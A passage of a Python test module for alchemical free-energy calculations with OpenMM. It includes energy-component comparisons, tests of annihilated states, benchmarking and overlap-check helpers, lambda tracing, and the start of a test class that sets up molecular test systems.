unmod_nn_exception_sterics, unmod_aa_exception_sterics, unmod_na_exception_sterics,\
unmod_nn_exception_electro, unmod_aa_exception_electro, unmod_na_exception_electro,\
unmod_nn_reciprocal_energy, unmod_aa_reciprocal_energy, unmod_na_reciprocal_energy = energy_components
# Get alchemically-modified energy components
if multi_regions:
print("Computing alchemical system components energies for region {}".format(alchemical_regions.name))
else:
print("Computing alchemical system components energies")
alchemical_state = AlchemicalState.from_system(alchemical_system, parameters_name_suffix=alchemical_regions.name)
alchemical_state.set_alchemical_parameters(1.0)
energy_components = AbsoluteAlchemicalFactory.get_energy_components(alchemical_system, alchemical_state,
positions, platform=GLOBAL_ALCHEMY_PLATFORM)
if multi_regions:
region_label = ' for region {}'.format(alchemical_regions.name)
else:
region_label = ''
# Sterics particle and exception interactions are always modeled with a custom force.
na_custom_particle_sterics = energy_components['alchemically modified NonbondedForce for non-alchemical/alchemical sterics' + region_label]
aa_custom_particle_sterics = energy_components['alchemically modified NonbondedForce for alchemical/alchemical sterics' + region_label]
na_custom_exception_sterics = energy_components['alchemically modified BondForce for non-alchemical/alchemical sterics exceptions' + region_label]
aa_custom_exception_sterics = energy_components['alchemically modified BondForce for alchemical/alchemical sterics exceptions' + region_label]
# With exact treatment of PME, we use the NonbondedForce offset for electrostatics.
try:
na_custom_particle_electro = energy_components['alchemically modified NonbondedForce for non-alchemical/alchemical electrostatics' + region_label]
aa_custom_particle_electro = energy_components['alchemically modified NonbondedForce for alchemical/alchemical electrostatics' + region_label]
na_custom_exception_electro = energy_components['alchemically modified BondForce for non-alchemical/alchemical electrostatics exceptions' + region_label]
aa_custom_exception_electro = energy_components['alchemically modified BondForce for alchemical/alchemical electrostatics exceptions' + region_label]
except KeyError:
assert is_exact_pme
# Test that all NonbondedForce contributions match
# -------------------------------------------------
# All contributions from alchemical atoms in unmodified nonbonded force are turned off
err_msg = 'Non-zero contribution from unmodified NonbondedForce alchemical atoms: '
assert_almost_equal(unmod_aa_particle_sterics, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_particle_sterics, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_aa_exception_sterics, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_exception_sterics, 0.0 * energy_unit, err_msg)
if not is_exact_pme:
# With exact PME treatment these are tested below.
assert_almost_equal(unmod_aa_particle_electro, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_particle_electro, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_aa_reciprocal_energy, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_reciprocal_energy, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_aa_exception_electro, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_exception_electro, 0.0 * energy_unit, err_msg)
# Check sterics interactions match
assert_almost_equal(nn_particle_sterics, unmod_nn_particle_sterics,
'Non-alchemical/non-alchemical atoms particle sterics' + region_label)
assert_almost_equal(nn_exception_sterics, unmod_nn_exception_sterics,
'Non-alchemical/non-alchemical atoms exceptions sterics' + region_label)
assert_almost_equal(aa_particle_sterics, aa_custom_particle_sterics,
'Alchemical/alchemical atoms particle sterics' + region_label)
assert_almost_equal(aa_exception_sterics, aa_custom_exception_sterics,
'Alchemical/alchemical atoms exceptions sterics' + region_label)
assert_almost_equal(na_particle_sterics, na_custom_particle_sterics,
'Non-alchemical/alchemical atoms particle sterics' + region_label)
assert_almost_equal(na_exception_sterics, na_custom_exception_sterics,
'Non-alchemical/alchemical atoms exceptions sterics' + region_label)
# Check electrostatics interactions
assert_almost_equal(nn_particle_electro, unmod_nn_particle_electro,
'Non-alchemical/non-alchemical atoms particle electrostatics' + region_label)
assert_almost_equal(nn_exception_electro, unmod_nn_exception_electro,
'Non-alchemical/non-alchemical atoms exceptions electrostatics' + region_label)
# With exact treatment of PME, the electrostatics of alchemical-alchemical
# atoms is modeled with NonbondedForce offsets.
if is_exact_pme:
# Reciprocal space.
assert_almost_equal(aa_reciprocal_energy, unmod_aa_reciprocal_energy,
'Alchemical/alchemical atoms reciprocal space energy' + region_label)
assert_almost_equal(na_reciprocal_energy, unmod_na_reciprocal_energy,
'Non-alchemical/alchemical atoms reciprocal space energy' + region_label)
# Direct space.
assert_almost_equal(aa_particle_electro, unmod_aa_particle_electro,
'Alchemical/alchemical atoms particle electrostatics' + region_label)
assert_almost_equal(na_particle_electro, unmod_na_particle_electro,
'Non-alchemical/alchemical atoms particle electrostatics' + region_label)
# Exceptions.
assert_almost_equal(aa_exception_electro, unmod_aa_exception_electro,
'Alchemical/alchemical atoms exceptions electrostatics' + region_label)
assert_almost_equal(na_exception_electro, unmod_na_exception_electro,
'Non-alchemical/alchemical atoms exceptions electrostatics' + region_label)
# With direct space PME, the custom forces model only the
# direct space of alchemical-alchemical interactions.
else:
# Get direct space correction due to reciprocal space exceptions
aa_correction, na_correction = compute_direct_space_correction(nonbonded_force,
alchemical_regions.alchemical_atoms,
positions)
aa_particle_electro += aa_correction
na_particle_electro += na_correction
# Check direct space energy
assert_almost_equal(aa_particle_electro, aa_custom_particle_electro,
'Alchemical/alchemical atoms particle electrostatics' + region_label)
assert_almost_equal(na_particle_electro, na_custom_particle_electro,
'Non-alchemical/alchemical atoms particle electrostatics' + region_label)
# Check exceptions.
assert_almost_equal(aa_exception_electro, aa_custom_exception_electro,
'Alchemical/alchemical atoms exceptions electrostatics' + region_label)
assert_almost_equal(na_exception_electro, na_custom_exception_electro,
'Non-alchemical/alchemical atoms exceptions electrostatics' + region_label)
# With Ewald methods, the NonbondedForce should always hold the
# reciprocal space energy of nonalchemical-nonalchemical atoms.
if nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]:
# Reciprocal space.
assert_almost_equal(nn_reciprocal_energy, unmod_nn_reciprocal_energy,
'Non-alchemical/non-alchemical atoms reciprocal space energy')
else:
# Reciprocal space energy should be null in this case
assert nn_reciprocal_energy == unmod_nn_reciprocal_energy == 0.0 * energy_unit
assert aa_reciprocal_energy == unmod_aa_reciprocal_energy == 0.0 * energy_unit
assert na_reciprocal_energy == unmod_na_reciprocal_energy == 0.0 * energy_unit
# Check forces other than nonbonded
# ----------------------------------
for force_name in ['HarmonicBondForce', 'HarmonicAngleForce', 'PeriodicTorsionForce',
'GBSAOBCForce', 'CustomGBForce']:
alchemical_forces_energies = [energy for label, energy in energy_components.items() if force_name in label]
reference_force_energy = compute_force_energy(reference_system, positions, force_name)
# There should be no force in the alchemical system if force_name is missing from the reference
if reference_force_energy is None:
assert len(alchemical_forces_energies) == 0, str(alchemical_forces_energies)
continue
# Check that the energies match
tot_alchemical_forces_energies = 0.0 * energy_unit
for energy in alchemical_forces_energies:
tot_alchemical_forces_energies += energy
assert_almost_equal(reference_force_energy, tot_alchemical_forces_energies,
'{} energy '.format(force_name))
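# Note (descriptive): the energy component labels queried above follow the naming scheme used
# by AbsoluteAlchemicalFactory.get_energy_components, e.g.
#     'alchemically modified NonbondedForce for non-alchemical/alchemical sterics'
# with an optional ' for region <name>' suffix when multiple alchemical regions are defined.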
def check_multi_noninteracting_energy_components(reference_system, alchemical_system, alchemical_regions, positions):
"""wrapper around check_noninteracting_energy_components for multiple regions
Parameters
----------
reference_system : simtk.openmm.System
The reference system (not alchemically modified).
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
"""
for region in alchemical_regions:
check_noninteracting_energy_components(reference_system, alchemical_system, region, positions, True)
def check_noninteracting_energy_components(reference_system, alchemical_system, alchemical_regions, positions, multi_regions=False):
"""Check non-interacting energy components are zero when appropriate.
Parameters
----------
reference_system : simtk.openmm.System
The reference system (not alchemically modified).
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
multi_regions : boolean
        Indicates if multiple regions are being tested.
"""
alchemical_system = copy.deepcopy(alchemical_system)
is_exact_pme = is_alchemical_pme_treatment_exact(alchemical_system)
# Set state to non-interacting.
alchemical_state = AlchemicalState.from_system(alchemical_system, parameters_name_suffix=alchemical_regions.name)
alchemical_state.set_alchemical_parameters(0.0)
energy_components = AbsoluteAlchemicalFactory.get_energy_components(alchemical_system, alchemical_state,
positions, platform=GLOBAL_ALCHEMY_PLATFORM)
def assert_zero_energy(label):
# Handle multiple alchemical regions.
if multi_regions:
label = label + ' for region ' + alchemical_regions.name
# Testing energy component of each region.
print('testing {}'.format(label))
value = energy_components[label]
assert abs(value / GLOBAL_ENERGY_UNIT) == 0.0, ("'{}' should have zero energy in annihilated alchemical"
" state, but energy is {}").format(label, str(value))
# Check that non-alchemical/alchemical particle interactions and 1,4 exceptions have been annihilated
assert_zero_energy('alchemically modified BondForce for non-alchemical/alchemical sterics exceptions')
assert_zero_energy('alchemically modified NonbondedForce for non-alchemical/alchemical sterics')
if is_exact_pme:
assert 'alchemically modified NonbondedForce for non-alchemical/alchemical electrostatics' not in energy_components
assert 'alchemically modified BondForce for non-alchemical/alchemical electrostatics exceptions' not in energy_components
else:
assert_zero_energy('alchemically modified NonbondedForce for non-alchemical/alchemical electrostatics')
assert_zero_energy('alchemically modified BondForce for non-alchemical/alchemical electrostatics exceptions')
# Check that alchemical/alchemical particle interactions and 1,4 exceptions have been annihilated
if alchemical_regions.annihilate_sterics:
assert_zero_energy('alchemically modified NonbondedForce for alchemical/alchemical sterics')
assert_zero_energy('alchemically modified BondForce for alchemical/alchemical sterics exceptions')
if alchemical_regions.annihilate_electrostatics:
if is_exact_pme:
assert 'alchemically modified NonbondedForce for alchemical/alchemical electrostatics' not in energy_components
assert 'alchemically modified BondForce for alchemical/alchemical electrostatics exceptions' not in energy_components
else:
assert_zero_energy('alchemically modified NonbondedForce for alchemical/alchemical electrostatics')
assert_zero_energy('alchemically modified BondForce for alchemical/alchemical electrostatics exceptions')
# Check valence terms
for force_name in ['HarmonicBondForce', 'HarmonicAngleForce', 'PeriodicTorsionForce']:
force_label = 'alchemically modified ' + force_name
if force_label in energy_components:
assert_zero_energy(force_label)
# Check implicit solvent force.
for force_name in ['CustomGBForce', 'GBSAOBCForce']:
label = 'alchemically modified ' + force_name
# Check if the system has an implicit solvent force.
try:
alchemical_energy = energy_components[label]
except KeyError: # No implicit solvent.
continue
# If all alchemical particles are modified, the alchemical energy should be zero.
if len(alchemical_regions.alchemical_atoms) == reference_system.getNumParticles():
assert_zero_energy(label)
continue
# Otherwise compare the alchemical energy with a
# reference system with only non-alchemical particles.
# Find implicit solvent force in reference system.
for reference_force in reference_system.getForces():
if reference_force.__class__.__name__ == force_name:
break
system = openmm.System()
force = reference_force.__class__()
# For custom GB forces, we need to copy all computed values,
# energy terms, parameters, tabulated functions and exclusions.
if isinstance(force, openmm.CustomGBForce):
for index in range(reference_force.getNumPerParticleParameters()):
name = reference_force.getPerParticleParameterName(index)
force.addPerParticleParameter(name)
for index in range(reference_force.getNumComputedValues()):
computed_value = reference_force.getComputedValueParameters(index)
force.addComputedValue(*computed_value)
for index in range(reference_force.getNumEnergyTerms()):
energy_term = reference_force.getEnergyTermParameters(index)
force.addEnergyTerm(*energy_term)
for index in range(reference_force.getNumGlobalParameters()):
name = reference_force.getGlobalParameterName(index)
default_value = reference_force.getGlobalParameterDefaultValue(index)
force.addGlobalParameter(name, default_value)
for function_index in range(reference_force.getNumTabulatedFunctions()):
name = reference_force.getTabulatedFunctionName(function_index)
function = reference_force.getTabulatedFunction(function_index)
function_copy = copy.deepcopy(function)
force.addTabulatedFunction(name, function_copy)
for exclusion_index in range(reference_force.getNumExclusions()):
particles = reference_force.getExclusionParticles(exclusion_index)
force.addExclusion(*particles)
# Create a system with only the non-alchemical particles.
for particle_index in range(reference_system.getNumParticles()):
if particle_index not in alchemical_regions.alchemical_atoms:
# Add particle to System.
mass = reference_system.getParticleMass(particle_index)
system.addParticle(mass)
                # Add particle to Force.
parameters = reference_force.getParticleParameters(particle_index)
try: # GBSAOBCForce
force.addParticle(*parameters)
except (TypeError, NotImplementedError): # CustomGBForce
force.addParticle(parameters)
system.addForce(force)
# Get positions for all non-alchemical particles.
non_alchemical_positions = [pos for i, pos in enumerate(positions)
if i not in alchemical_regions.alchemical_atoms]
# Compute reference force energy.
reference_force_energy = compute_force_energy(system, non_alchemical_positions, force_name)
assert_almost_equal(reference_force_energy, alchemical_energy,
'reference {}, alchemical {}'.format(reference_force_energy, alchemical_energy))
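# Note (descriptive): the implicit-solvent comparison above rebuilds a reference system that
# contains only the non-alchemical particles, because at lambda=0 a decoupled GB force is
# expected to reproduce the energy of the remaining (non-alchemical) particles alone.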
def check_split_force_groups(system, region_names=None):
"""Check that force groups are split correctly."""
if region_names is None:
region_names = []
# Separate forces groups by lambda parameters that AlchemicalState supports.
for region in region_names:
force_groups_by_lambda = {}
lambdas_by_force_group = {}
for force, lambda_name, _ in AlchemicalState._get_system_controlled_parameters(
system, parameters_name_suffix=region):
force_group = force.getForceGroup()
try:
force_groups_by_lambda[lambda_name].add(force_group)
except KeyError:
force_groups_by_lambda[lambda_name] = {force_group}
try:
lambdas_by_force_group[force_group].add(lambda_name)
except KeyError:
lambdas_by_force_group[force_group] = {lambda_name}
# Check that force group 0 doesn't hold alchemical forces.
assert 0 not in force_groups_by_lambda
# There are as many alchemical force groups as not-None lambda variables.
alchemical_state = AlchemicalState.from_system(system, parameters_name_suffix=region)
valid_lambdas = {lambda_name for lambda_name in alchemical_state._get_controlled_parameters(parameters_name_suffix=region)
if getattr(alchemical_state, lambda_name) is not None}
assert valid_lambdas == set(force_groups_by_lambda.keys())
# Check that force groups and lambda variables are in 1-to-1 correspondence.
assert len(force_groups_by_lambda) == len(lambdas_by_force_group)
for d in [force_groups_by_lambda, lambdas_by_force_group]:
for value in d.values():
assert len(value) == 1
# With exact treatment of PME, the NonbondedForce must
# be in the lambda_electrostatics force group.
if is_alchemical_pme_treatment_exact(system):
force_idx, nonbonded_force = forces.find_forces(system, openmm.NonbondedForce, only_one=True)
assert force_groups_by_lambda['lambda_electrostatics_{}'.format(region)] == {nonbonded_force.getForceGroup()}
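# Example (hedged sketch): for a region named 'zero' with both sterics and electrostatics
# modified, the bookkeeping above is expected to end up roughly as
#     force_groups_by_lambda == {'lambda_sterics_zero': {1}, 'lambda_electrostatics_zero': {2}}
#     lambdas_by_force_group == {1: {'lambda_sterics_zero'}, 2: {'lambda_electrostatics_zero'}}
# (the actual group numbers are arbitrary); the asserts then enforce a 1-to-1 mapping between
# lambda parameters and non-zero force groups.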
# =============================================================================
# BENCHMARKING AND DEBUG FUNCTIONS
# =============================================================================
def benchmark(reference_system, alchemical_regions, positions, nsteps=500,
timestep=1.0*unit.femtoseconds):
"""
Benchmark performance of alchemically modified system relative to original system.
Parameters
----------
reference_system : simtk.openmm.System
The reference System object to compare with.
alchemical_regions : AlchemicalRegion
The region to alchemically modify.
positions : n_particlesx3 array-like of simtk.unit.Quantity
The initial positions (units of distance).
nsteps : int, optional
Number of molecular dynamics steps to use for benchmarking (default is 500).
timestep : simtk.unit.Quantity, optional
Timestep to use for benchmarking (units of time, default is 1.0*unit.femtoseconds).
"""
timer = utils.Timer()
# Create the perturbed system.
factory = AbsoluteAlchemicalFactory()
timer.start('Create alchemical system')
alchemical_system = factory.create_alchemical_system(reference_system, alchemical_regions)
timer.stop('Create alchemical system')
# Create an alchemically-perturbed state corresponding to nearly fully-interacting.
# NOTE: We use a lambda slightly smaller than 1.0 because the AbsoluteAlchemicalFactory
# may not use Custom*Force softcore versions if lambda = 1.0 identically.
alchemical_state = AlchemicalState.from_system(alchemical_system)
alchemical_state.set_alchemical_parameters(1.0 - 1.0e-6)
# Create integrators.
reference_integrator = openmm.VerletIntegrator(timestep)
alchemical_integrator = openmm.VerletIntegrator(timestep)
# Create contexts for sampling.
if GLOBAL_ALCHEMY_PLATFORM:
reference_context = openmm.Context(reference_system, reference_integrator, GLOBAL_ALCHEMY_PLATFORM)
alchemical_context = openmm.Context(alchemical_system, alchemical_integrator, GLOBAL_ALCHEMY_PLATFORM)
else:
reference_context = openmm.Context(reference_system, reference_integrator)
alchemical_context = openmm.Context(alchemical_system, alchemical_integrator)
reference_context.setPositions(positions)
alchemical_context.setPositions(positions)
# Make sure all kernels are compiled.
reference_integrator.step(1)
alchemical_integrator.step(1)
# Run simulations.
print('Running reference system...')
timer.start('Run reference system')
reference_integrator.step(nsteps)
timer.stop('Run reference system')
print('Running alchemical system...')
timer.start('Run alchemical system')
alchemical_integrator.step(nsteps)
timer.stop('Run alchemical system')
print('Done.')
timer.report_timing()
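# Example (illustrative, not executed by the suite): a typical manual benchmark run might look like
#     test_system = testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.PME)
#     region = AlchemicalRegion(alchemical_atoms=range(126, 156))
#     benchmark(test_system.system, region, test_system.positions, nsteps=100)
# The atom range mirrors the HostGuestExplicit region used by the test classes below.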
def benchmark_alchemy_from_pdb():
"""CLI entry point for benchmarking alchemical performance from a PDB file.
"""
logging.basicConfig(level=logging.DEBUG)
import mdtraj
import argparse
from simtk.openmm import app
parser = argparse.ArgumentParser(description='Benchmark performance of alchemically-modified system.')
parser.add_argument('-p', '--pdb', metavar='PDBFILE', type=str, action='store', required=True,
help='PDB file to benchmark; only protein forcefields supported for now (no small molecules)')
parser.add_argument('-s', '--selection', metavar='SELECTION', type=str, action='store', default='not water',
help='MDTraj DSL describing alchemical region (default: "not water")')
parser.add_argument('-n', '--nsteps', metavar='STEPS', type=int, action='store', default=1000,
help='Number of benchmarking steps (default: 1000)')
args = parser.parse_args()
# Read the PDB file
print('Loading PDB file...')
pdbfile = app.PDBFile(args.pdb)
print('Loading forcefield...')
forcefield = app.ForceField('amber99sbildn.xml', 'tip3p.xml')
print('Adding missing hydrogens...')
modeller = app.Modeller(pdbfile.topology, pdbfile.positions)
modeller.addHydrogens(forcefield)
print('Creating System...')
reference_system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.PME)
# Minimize
print('Minimizing...')
positions = minimize(reference_system, modeller.positions)
# Select alchemical regions
mdtraj_topology = mdtraj.Topology.from_openmm(modeller.topology)
alchemical_atoms = mdtraj_topology.select(args.selection)
alchemical_region = AlchemicalRegion(alchemical_atoms=alchemical_atoms)
print('There are %d atoms in the alchemical region.' % len(alchemical_atoms))
# Benchmark
print('Benchmarking...')
benchmark(reference_system, alchemical_region, positions, nsteps=args.nsteps, timestep=1.0*unit.femtoseconds)
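# Example invocation (hypothetical console-script name; the actual name depends on how the
# package registers this entry point in its setup configuration):
#     alchemy-benchmark --pdb protein.pdb --selection "not water" --nsteps 1000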
def overlap_check(reference_system, alchemical_system, positions, nsteps=50, nsamples=200,
cached_trajectory_filename=None, name=""):
"""
Test overlap between reference system and alchemical system by running a short simulation.
Parameters
----------
reference_system : simtk.openmm.System
The reference System object to compare with.
alchemical_system : simtk.openmm.System
Alchemically-modified system.
positions : n_particlesx3 array-like of simtk.unit.Quantity
The initial positions (units of distance).
nsteps : int, optional
Number of molecular dynamics steps between samples (default is 50).
nsamples : int, optional
        Number of samples to collect (default is 200).
cached_trajectory_filename : str, optional, default=None
If not None, this file will be used to cache intermediate results with pickle.
    name : str, optional, default=""
Name of test system being evaluated.
"""
temperature = 300.0 * unit.kelvin
pressure = 1.0 * unit.atmospheres
collision_rate = 5.0 / unit.picoseconds
timestep = 2.0 * unit.femtoseconds
kT = kB * temperature
# Minimize
positions = minimize(reference_system, positions)
# Add a barostat if possible.
reference_system = copy.deepcopy(reference_system)
if reference_system.usesPeriodicBoundaryConditions():
reference_system.addForce(openmm.MonteCarloBarostat(pressure, temperature))
# Create integrators.
reference_integrator = openmm.LangevinIntegrator(temperature, collision_rate, timestep)
alchemical_integrator = openmm.VerletIntegrator(timestep)
# Create contexts.
reference_context = create_context(reference_system, reference_integrator)
alchemical_context = create_context(alchemical_system, alchemical_integrator)
    # Initialize the data structure, or load it from the cache.
# du_n[n] is the potential energy difference of sample n.
if cached_trajectory_filename is not None:
try:
with open(cached_trajectory_filename, 'rb') as f:
data = pickle.load(f)
except FileNotFoundError:
data = dict(du_n=[])
# Create directory if it doesn't exist.
directory = os.path.dirname(cached_trajectory_filename)
if not os.path.exists(directory):
os.makedirs(directory)
else:
positions = data['positions']
reference_context.setPeriodicBoxVectors(*data['box_vectors'])
else:
data = dict(du_n=[])
# Collect simulation data.
iteration = len(data['du_n'])
reference_context.setPositions(positions)
print()
for sample in range(iteration, nsamples):
print('\rSample {}/{}'.format(sample+1, nsamples), end='')
sys.stdout.flush()
# Run dynamics.
reference_integrator.step(nsteps)
# Get reference energies.
reference_state = reference_context.getState(getEnergy=True, getPositions=True)
reference_potential = reference_state.getPotentialEnergy()
if np.isnan(reference_potential/kT):
raise Exception("Reference potential is NaN")
# Get alchemical energies.
alchemical_context.setPeriodicBoxVectors(*reference_state.getPeriodicBoxVectors())
alchemical_context.setPositions(reference_state.getPositions(asNumpy=True))
alchemical_state = alchemical_context.getState(getEnergy=True)
alchemical_potential = alchemical_state.getPotentialEnergy()
if np.isnan(alchemical_potential/kT):
raise Exception("Alchemical potential is NaN")
# Update and cache data.
data['du_n'].append((alchemical_potential - reference_potential) / kT)
if cached_trajectory_filename is not None:
# Save only last iteration positions and vectors.
data['positions'] = reference_state.getPositions()
data['box_vectors'] = reference_state.getPeriodicBoxVectors()
with open(cached_trajectory_filename, 'wb') as f:
pickle.dump(data, f)
    # Discard data prior to equilibration and subsample the remainder.
du_n = np.array(data['du_n'])
from pymbar import timeseries, EXP
t0, g, Neff = timeseries.detectEquilibration(du_n)
indices = timeseries.subsampleCorrelatedData(du_n, g=g)
du_n = du_n[indices]
# Compute statistics.
DeltaF, dDeltaF = EXP(du_n)
# Raise an exception if the error is larger than 3kT.
MAX_DEVIATION = 3.0 # kT
report = ('\nDeltaF = {:12.3f} +- {:12.3f} kT ({:3.2f} samples, g = {:3.1f}); '
'du mean {:.3f} kT stddev {:.3f} kT').format(DeltaF, dDeltaF, Neff, g, du_n.mean(), du_n.std())
print(report)
if dDeltaF > MAX_DEVIATION:
raise Exception(report)
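# Note (descriptive): EXP here is the one-sided exponential (Zwanzig) free energy estimator,
# DeltaF = -ln < exp(-du) >, evaluated over the decorrelated samples; dDeltaF is its statistical
# error estimate, which is what the 3 kT threshold above is applied to.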
def rstyle(ax):
"""Styles x,y axes to appear like ggplot2
Must be called after all plot and axis manipulation operations have been
carried out (needs to know final tick spacing)
From:
http://nbviewer.ipython.org/github/wrobstory/climatic/blob/master/examples/ggplot_styling_for_matplotlib.ipynb
"""
import pylab
import matplotlib
import matplotlib.pyplot as plt
    # Set the style of the major and minor grid lines, filled blocks
ax.grid(True, 'major', color='w', linestyle='-', linewidth=1.4)
ax.grid(True, 'minor', color='0.99', linestyle='-', linewidth=0.7)
ax.patch.set_facecolor('0.90')
ax.set_axisbelow(True)
    # Set minor tick spacing to 1/2 of the major ticks
ax.xaxis.set_minor_locator((pylab.MultipleLocator((plt.xticks()[0][1] - plt.xticks()[0][0]) / 2.0)))
ax.yaxis.set_minor_locator((pylab.MultipleLocator((plt.yticks()[0][1] - plt.yticks()[0][0]) / 2.0)))
    # Remove axis border
for child in ax.get_children():
if isinstance(child, matplotlib.spines.Spine):
child.set_alpha(0)
    # Restyle the tick lines
for line in ax.get_xticklines() + ax.get_yticklines():
line.set_markersize(5)
line.set_color("gray")
line.set_markeredgewidth(1.4)
    # Remove the minor tick lines
for line in (ax.xaxis.get_ticklines(minor=True) +
ax.yaxis.get_ticklines(minor=True)):
line.set_markersize(0)
    # Only show bottom left ticks, pointing out of axis
plt.rcParams['xtick.direction'] = 'out'
plt.rcParams['ytick.direction'] = 'out'
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
def lambda_trace(reference_system, alchemical_regions, positions, nsteps=100):
"""
Compute potential energy as a function of lambda.
"""
# Create a factory to produce alchemical intermediates.
factory = AbsoluteAlchemicalFactory()
alchemical_system = factory.create_alchemical_system(reference_system, alchemical_regions)
alchemical_state = AlchemicalState.from_system(alchemical_system)
# Take equally-sized steps.
delta = 1.0 / nsteps
# Compute unmodified energy.
u_original = compute_energy(reference_system, positions)
# Scan through lambda values.
lambda_i = np.zeros([nsteps+1], np.float64) # lambda values for u_i
# u_i[i] is the potential energy for lambda_i[i]
u_i = unit.Quantity(np.zeros([nsteps+1], np.float64), unit.kilocalories_per_mole)
for i in range(nsteps+1):
lambda_i[i] = 1.0-i*delta
alchemical_state.set_alchemical_parameters(lambda_i[i])
alchemical_state.apply_to_system(alchemical_system)
u_i[i] = compute_energy(alchemical_system, positions)
logger.info("{:12.9f} {:24.8f} kcal/mol".format(lambda_i[i], u_i[i] / GLOBAL_ENERGY_UNIT))
# Write figure as PDF.
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
with PdfPages('lambda-trace.pdf') as pdf:
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot(111)
plt.plot(1, u_original / unit.kilocalories_per_mole, 'ro', label='unmodified')
plt.plot(lambda_i, u_i / unit.kilocalories_per_mole, 'k.', label='alchemical')
plt.title('T4 lysozyme L99A + p-xylene : AMBER96 + OBC GBSA')
plt.ylabel('potential (kcal/mol)')
plt.xlabel('lambda')
ax.legend()
rstyle(ax)
pdf.savefig() # saves the current figure into a pdf page
plt.close()
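# Example (illustrative sketch, not executed): tracing the alanine dipeptide region defined
# later in this module; this writes 'lambda-trace.pdf' in the working directory.
#     test_system = testsystems.AlanineDipeptideImplicit()
#     region = AlchemicalRegion(alchemical_atoms=range(22))
#     lambda_trace(test_system.system, region, test_system.positions, nsteps=20)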
def generate_trace(test_system):
    # Build an alchemical region from the ligand atoms and trace the potential energy along
    # lambda; arguments are ordered to match the lambda_trace() signature above. The
    # receptor_atoms entry is not needed by lambda_trace().
    alchemical_region = AlchemicalRegion(alchemical_atoms=test_system['ligand_atoms'])
    lambda_trace(test_system['test'].system, alchemical_region, test_system['test'].positions)
# =============================================================================
# TEST ALCHEMICAL FACTORY SUITE
# =============================================================================
def test_resolve_alchemical_region():
"""Test the method AbsoluteAlchemicalFactory._resolve_alchemical_region."""
test_cases = [
(testsystems.AlanineDipeptideVacuum(), range(22), 9, 36, 48),
(testsystems.AlanineDipeptideVacuum(), range(11, 22), 4, 21, 31),
(testsystems.LennardJonesCluster(), range(27), 0, 0, 0)
]
for i, (test_case, atoms, n_bonds, n_angles, n_torsions) in enumerate(test_cases):
system = test_case.system
        # Default arguments are converted to empty sets.
alchemical_region = AlchemicalRegion(alchemical_atoms=atoms)
resolved_region = AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
for region in ['bonds', 'angles', 'torsions']:
assert getattr(resolved_region, 'alchemical_' + region) == set()
# Numpy arrays are converted to sets.
alchemical_region = AlchemicalRegion(alchemical_atoms=np.array(atoms),
alchemical_bonds=np.array(range(n_bonds)),
alchemical_angles=np.array(range(n_angles)),
alchemical_torsions=np.array(range(n_torsions)))
resolved_region = AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
for region in ['atoms', 'bonds', 'angles', 'torsions']:
assert isinstance(getattr(resolved_region, 'alchemical_' + region), frozenset)
# Bonds, angles and torsions are inferred correctly.
alchemical_region = AlchemicalRegion(alchemical_atoms=atoms, alchemical_bonds=True,
alchemical_angles=True, alchemical_torsions=True)
resolved_region = AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
for j, region in enumerate(['bonds', 'angles', 'torsions']):
assert len(getattr(resolved_region, 'alchemical_' + region)) == test_cases[i][j+2]
        # An exception is raised if the indices are not part of the system.
alchemical_region = AlchemicalRegion(alchemical_atoms=[10000000])
with nose.tools.assert_raises(ValueError):
AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
# An exception is raised if nothing is defined.
alchemical_region = AlchemicalRegion()
with nose.tools.assert_raises(ValueError):
AbsoluteAlchemicalFactory._resolve_alchemical_region(system, alchemical_region)
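# Example (hedged sketch): the inference exercised above is requested by passing booleans for
# the valence terms, e.g.
#     region = AlchemicalRegion(alchemical_atoms=range(22), alchemical_bonds=True,
#                               alchemical_angles=True, alchemical_torsions=True)
#     resolved = AbsoluteAlchemicalFactory._resolve_alchemical_region(system, region)
# after which resolved.alchemical_bonds holds the indices of bonds between alchemical atoms.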
class TestAbsoluteAlchemicalFactory(object):
"""Test AbsoluteAlchemicalFactory class."""
@classmethod
def setup_class(cls):
"""Create test systems and shared objects."""
cls.define_systems()
cls.define_regions()
cls.generate_cases()
@classmethod
def define_systems(cls):
"""Create shared test systems in cls.test_systems for the test suite."""
cls.test_systems = dict()
# Basic test systems: Lennard-Jones and water particles only.
        # Also test with the dispersion correction and switching function turned off
        # ("on" values for these options are tested in the HostGuestExplicit system).
cls.test_systems['LennardJonesCluster'] = testsystems.LennardJonesCluster()
cls.test_systems['LennardJonesFluid with dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=True)
cls.test_systems['TIP3P WaterBox with reaction field, no switch, no dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=False, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['TIP4P-EW WaterBox and NaCl with PME'] = \
testsystems.WaterBox(nonbondedMethod=openmm.app.PME, model='tip4pew', ionic_strength=200*unit.millimolar)
# Vacuum and implicit.
cls.test_systems['AlanineDipeptideVacuum'] = testsystems.AlanineDipeptideVacuum()
cls.test_systems['AlanineDipeptideImplicit'] = testsystems.AlanineDipeptideImplicit()
cls.test_systems['TolueneImplicitOBC2'] = testsystems.TolueneImplicitOBC2()
